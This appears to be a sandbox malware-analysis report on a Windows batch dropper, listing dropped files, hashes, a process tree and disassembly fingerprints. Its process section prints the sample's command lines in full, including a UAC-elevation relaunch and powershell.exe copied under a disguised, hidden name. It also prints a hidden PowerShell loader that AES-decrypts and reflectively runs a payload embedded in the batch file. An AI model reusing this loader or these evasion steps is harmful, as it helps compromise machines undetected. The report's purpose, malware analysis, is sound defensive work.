Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\58553ff4dedf0b1dd22a283773a566fc\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\8b2774850bdc17a926dc650317d86b33\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1112
Entropy (8bit):	5.239873149289492
Encrypted:	false
SSDEEP:	24:3VPpQrLAo4KAxq42FCvKM515qRProFe9tCKnKyHrKgy:lPerB4U/FCvN1qRkFe9tC4nHg
MD5:	D7669254760C75AB6BD5C2776FD04E01
SHA1:	4AB00DB225330C91B2F1AABBF2022A9E5AA8A695
SHA-256:	25B435D48A9F3DCDDCE39811C1DA3A618B431F197D8F6A4276EF02CE2E5B6467
SHA-512:	7DFCC33AFA029FCFEE08F888298A7C49CF6B7BE308BC0B903F751C48240173A8841A65ACE26130BCA0599EE9194D7F6EBBC349FA3947DA4D9029BE060D2232E1
Malicious:	false
Preview:	@...e.................................t.........................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices<................):gK..G...$.1.q........System.Configuration4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep0nkokm.njz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_je3w0lz2.ags.ps1

Download File

Process:	C:\Users\user\Desktop\new_7.txt.bat.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj3z4vfm.ghc.psm1

Download File

Process:	C:\Users\user\Desktop\new_7.txt.bat.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0t53sw2.il2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\Desktop\new_7.txt.bat.exe

Download File

Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	447488
Entropy (8bit):	5.440627434620499
Encrypted:	false
SSDEEP:	6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq
MD5:	95000560239032BC68B4C2FDFCDEF913
SHA1:	1B3B40FBC889FD4C645CC12C85D0805AC36BA254
SHA-256:	D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
SHA-512:	F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 5%, Browse
Joe Sandbox View:	Filename: RYqBekH3KI.bat, Detection: malicious, Browse Filename: 6UYJe0kL46.exe, Detection: malicious, Browse Filename: client.bat, Detection: malicious, Browse Filename: cleaner.bat, Detection: malicious, Browse Filename: cleaner.bat, Detection: malicious, Browse Filename: 3eZ74K3lnn.exe, Detection: malicious, Browse Filename: 1dGBb5N0oG.exe, Detection: malicious, Browse Filename: dad_.exe, Detection: malicious, Browse Filename: 4.ppam, Detection: malicious, Browse Filename: 4.ppam, Detection: malicious, Browse Filename: malicious.ps1, Detection: malicious, Browse Filename: mltqanainst.exe, Detection: malicious, Browse Filename: lemonduck.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................G.......G.............................................+...........Rich............................PE..d....)............"..........P...... 2.........@..........................................`.......... ......................................\|@.......p...}...`..................0...P...T.......................(....................................................text.............................. ..`.rdata..............................@..@.data...8....P.......<..............@....pdata.......`.......B..............@..@.rsrc....}...p...~...L..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (21208), with CRLF line terminators
Entropy (8bit):	6.0902730766021325
TrID:
File name:	new_7.txt.bat
File size:	22908
MD5:	015ab34ae838120d78786301759920b2
SHA1:	81040c2858d637e00c690abc41b083b69dfa9595
SHA256:	0e726ad2eea01946be18df7ef4f207f6dfb7fcc77d20ddd49ddf7a6771356434
SHA512:	94c058af8271b56460c4a88eafbf9fb43a138c33ef7a32df91174934f8d491a5af8a9350d4b64d88af388a763d3fd1ccfb81e9c6860bf82d50bbd61f59f7cbce
SSDEEP:	384:pPidY+Td2BLmAhFaImwYC8jMBxqH/hnLZ/z4MYDKfAYQ60OtqIHHIgWQsbx8:pYp2kA2IcC6M4/hLZ/8rnlO8IN0x8
TLSH:	0CA2E0A71768789CCAE4A117D2AEF14D3E37350A170244D536FBC611B2824EAE8FD54F
File Content Preview:	@echo off..if not "%1"=="am_admin" (.. powershell -Command "Start-Process -Verb RunAs -FilePath '%0' -ArgumentList 'am_admin'".. exit /b..)..@echo off..echo F\|xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe %~n0.bat.exe /y..attrib +s

File Icon


Icon Hash:	988686829e9ae600

• cmd.exe
• conhost.exe
• powershell.exe
• cmd.exe
• conhost.exe
• cmd.exe
• xcopy.exe
• attrib.exe
• new_7.txt.bat.exe
• attrib.exe

Click to jump to process

Memory Usage

• cmd.exe
• conhost.exe
• powershell.exe
• cmd.exe
• conhost.exe
• cmd.exe
• xcopy.exe
• attrib.exe
• new_7.txt.bat.exe
• attrib.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	11:12:02
Start date:	13/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new_7.txt.bat" "
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	11:12:02
Start date:	13/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	11:12:03
Start date:	13/10/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"
Imagebase:	0x7ff71eaa0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	11:12:06
Start date:	13/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\new_7.txt.bat" am_admin
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	11:12:06
Start date:	13/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	11:12:07
Start date:	13/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo F"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	11:12:07
Start date:	13/10/2022
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new_7.txt.bat.exe /y
Imagebase:	0x7ff6316b0000
File size:	47616 bytes
MD5 hash:	6BC7DB1465BEB7607CBCBD7F64007219
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	7
Start time:	11:12:07
Start date:	13/10/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h new_7.txt.bat.exe
Imagebase:	0x7ff7317c0000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	8
Start time:	11:12:07
Start date:	13/10/2022
Path:	C:\Users\user\Desktop\new_7.txt.bat.exe
Wow64 process (32bit):	false
Commandline:	new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $GErDCs = [System.IO.File]::ReadAllText('C:\Users\user\Desktop\new_7.txt.bat').Split([Environment]::NewLine);$wnrxWS = $GErDCs[$GErDCs.Length - 1];$TNzJht = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class HBjTWL { public static byte[] apTBPb(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] xLdugB(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }'));Add-Type -TypeDefinition $TNzJht;[System.Reflection.Assembly]::Load([HBjTWL]::xLdugB([HBjTWL]::apTBPb([System.Convert]::FromBase64String($wnrxWS), [System.Convert]::FromBase64String('MjRhIG1Y63akCBVDPHdI4uJaXGMCeTuk1uW/CtYuSZU='), [System.Convert]::FromBase64String('o0lNLh6cZrdnCdGsa1aPww==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
Imagebase:	0x7ff7d81c0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 5%, Metadefender, Browse
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	11:12:25
Start date:	13/10/2022
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -s -h new_7.txt.bat.exe
Imagebase:	0x7ff7317c0000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Function 00007FF814C905A2 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

g5s, xrefs: 00007FF814C905E3

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID: g5s
API String ID: 0-234503907
Opcode ID: 1440334a515890cbbcd79fd9534293db1d1be90d59df30121e42dbe00f49038f
Instruction ID: 312c83e2d2ee619a4f42b2c21c8afb6fb12fb9cf5e7275ad240cd5ad09d13a8e
Opcode Fuzzy Hash: 1440334a515890cbbcd79fd9534293db1d1be90d59df30121e42dbe00f49038f
Instruction Fuzzy Hash: A511B771A18D099FEBA8EA2C94947B973E2FF98750B14027FE44ED3692CE35D8008744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C94FDD Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff4478ef720cc271d4d01a42f244619a5e23b560945a262ffc92aa455aab1ef
Instruction ID: 5ea39525f889435e21e735ad12d9132c08fdee59ca2e94d8828d75ac51df3989
Opcode Fuzzy Hash: 5ff4478ef720cc271d4d01a42f244619a5e23b560945a262ffc92aa455aab1ef
Instruction Fuzzy Hash: D5D13B7291EBC9AFD356972898556B57FA0FF53260B0902FBD08DCB093DA285846C392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC382C Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b9aac01fdea77b8cb20d04de5c721f0fdee5825d4bdae2626695c1aacfaf68
Instruction ID: 5dc59038322d175fe3ef4e0c0f73bd83e7aba829a2b86016da9a4e1f8be3995b
Opcode Fuzzy Hash: a4b9aac01fdea77b8cb20d04de5c721f0fdee5825d4bdae2626695c1aacfaf68
Instruction Fuzzy Hash: C4D1EA77D0DAC25FE766A66CA8E61E57FA0EF533B074805F7D0848B093EE09194B8361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C948BA Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5952345e6fdb2f9cf32d0149b66b0340b0b9c50a018875f77272c2919045a626
Instruction ID: fdf8b10c9939037fb6f2e4bc29758da99bc300c4d26838661230b565daa90f1d
Opcode Fuzzy Hash: 5952345e6fdb2f9cf32d0149b66b0340b0b9c50a018875f77272c2919045a626
Instruction Fuzzy Hash: DFC14832A1CE4C9FE795EA2898847B5BBD1EF96360B0402BFD44DC7193DE29E8468345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC2BE7 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8508e64ea3b63389a3fcf8aa2bee515544e49013a6b250fe60e9f42b5b53106
Instruction ID: 73a752570fecc2532a6bddb91f0cff4dd4d123d3486bfa9cb7ed1d5e1ea70737
Opcode Fuzzy Hash: c8508e64ea3b63389a3fcf8aa2bee515544e49013a6b250fe60e9f42b5b53106
Instruction Fuzzy Hash: 2BC13C31E18A0E8FDF98EF58C4D5AA97BF2FF69350F144669D40DD7295CA34E8818B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C934CD Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46eb7596efbb0ef67086f0021b3c0a12e0ee7e2b773026f314305d14eb4021b2
Instruction ID: 4d975b2c2c3b0f5078cac52893d380a292e9b65bbab0e4fbad1068dcc5a25ef5
Opcode Fuzzy Hash: 46eb7596efbb0ef67086f0021b3c0a12e0ee7e2b773026f314305d14eb4021b2
Instruction Fuzzy Hash: AFA1497291DE8C9FD791EB2998946A67FE1FF4A360F0402BBD44CC71A3DB289845C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C910C4 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c824d0d4ff6459045a5ba3a551b8e1d64b33928c1ccf03ff57ba26fa819a4a
Instruction ID: 5336cbad5caeb02ef5f22ca2a57f50c7b4adcdf6d6df73a4edd7aca7a3b50f18
Opcode Fuzzy Hash: 35c824d0d4ff6459045a5ba3a551b8e1d64b33928c1ccf03ff57ba26fa819a4a
Instruction Fuzzy Hash: 5641AE9690EBC5AFE39397785CA61647FA0AF93264B0D01FFD0C8CB1E7D818081AC312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C9108B Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e794dccf2f5d7ec253e0b1abff69fb7867c4fa2c165dc7ef11b4cd912b3bb8
Instruction ID: c61c114616c2bcd2246bdaef8e003b90153ebeb12b0236a098ae520b1248a9da
Opcode Fuzzy Hash: e0e794dccf2f5d7ec253e0b1abff69fb7867c4fa2c165dc7ef11b4cd912b3bb8
Instruction Fuzzy Hash: 6941AE9694EBC5AFE35397785CA61A57FA09F432A471D05FFD0C8CB0E7D818181AC312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC3CFD Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b590e578894f9dd40fc926b4a08676de9ec178c672dda4c169801b83030c76b
Instruction ID: de63374f4b51ed83065a1dc8d26db5fa26b055a9858fce732201f5875001de23
Opcode Fuzzy Hash: 5b590e578894f9dd40fc926b4a08676de9ec178c672dda4c169801b83030c76b
Instruction Fuzzy Hash: 41316A32E0ED8A8FE7A1E66C98D45F527D2FF163B4B9805B6C08CC7193DE18E9464300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC3555 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5c2ed32a774bae1bfe5b5a7974d65c359905b6b15aa23e30b99c22029bdecd
Instruction ID: 7d0f39a89b158ae2bc269b2d532ff329eadf3c7dea84030e2402522ec5ccb08e
Opcode Fuzzy Hash: bc5c2ed32a774bae1bfe5b5a7974d65c359905b6b15aa23e30b99c22029bdecd
Instruction Fuzzy Hash: DC212722B1DF894FE7A2D36C58E42B46BE0EF5A260B4905FBC00CCB1E3DD185D428391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C93604 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0f584684c81cc86e8d4b90545a2c375846c3c82721c935c6a86acb8d1f7beb
Instruction ID: 6c672a2fba4813b8959fe5212e25a19db88107f0f736e22460be8e350f073d98
Opcode Fuzzy Hash: fb0f584684c81cc86e8d4b90545a2c375846c3c82721c935c6a86acb8d1f7beb
Instruction Fuzzy Hash: 3E11E762D0DE8ADFE7A5961994942B866D1FF4A7A0B5512BBC04DC73E2DE28AC448301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC2D38 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c120c4b6408774fd6e29bde4707bdf36fc298a014e05fcc4c0f2977630e5c4
Instruction ID: 032b73728c0b7804bd4786338055695269c155dd2be08b5f13b03f8091d75df5
Opcode Fuzzy Hash: 11c120c4b6408774fd6e29bde4707bdf36fc298a014e05fcc4c0f2977630e5c4
Instruction Fuzzy Hash: B6219D31A1890D8FDF98EF98C495EEDB7B1FF68351F148665D40DD7255CA34A881CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC359C Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8acbfe6cc00520a98fe47a0f6b177cf146abd0e8680104a38453b6035d1c3e5a
Instruction ID: 853f061a04a42e1a227a4652938e996d24d236238b0f3c07452ddb2f5d55541e
Opcode Fuzzy Hash: 8acbfe6cc00520a98fe47a0f6b177cf146abd0e8680104a38453b6035d1c3e5a
Instruction Fuzzy Hash: D701DF22B1DE4E4FEBE4E26C64D42B467C1EBA9374B4405BAD40DC36E2DD28AC428390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C93BAE Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1696aacdfda257cc2ee0825fc1c5694950b99735684a72fd20cbec58cc40d450
Instruction ID: d40968cad20896f8828f9cd9aa93705faa3dfdb1db9db630ad11481081a55f8e
Opcode Fuzzy Hash: 1696aacdfda257cc2ee0825fc1c5694950b99735684a72fd20cbec58cc40d450
Instruction Fuzzy Hash: 7811C472E0CA898FE755EA5894D55B87B91EF2E3A1B1812FFC01DC71D3CB34A8458351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC4EC8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9788fb0fd9f54e0053a168a606891b02c0239b8f99b30f0201eab6aa08589fa3
Instruction ID: cfbcd8b8d59878fc1c99e1cb6ff9dc6972011fa69fd01a56d5877106dd2581d2
Opcode Fuzzy Hash: 9788fb0fd9f54e0053a168a606891b02c0239b8f99b30f0201eab6aa08589fa3
Instruction Fuzzy Hash: 9701A73131CA088FE78CEA1CD492AB573E1EB95360B50006ED44BC7697DE27E843C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C95C4D Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb629ca7a63134c8dd16b026a7caba24f1d0ed6e64f4e5d582d3b0f8f8877e4
Instruction ID: 3a6d75f98130655f9665b178d77471ecba5434e7c530aba2038dacd367000e1b
Opcode Fuzzy Hash: 0cb629ca7a63134c8dd16b026a7caba24f1d0ed6e64f4e5d582d3b0f8f8877e4
Instruction Fuzzy Hash: C601C8A3E0EAC5DFE796A33858951786BE1AF27AA471805FFC049CB1D3ED185C488312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC43A5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

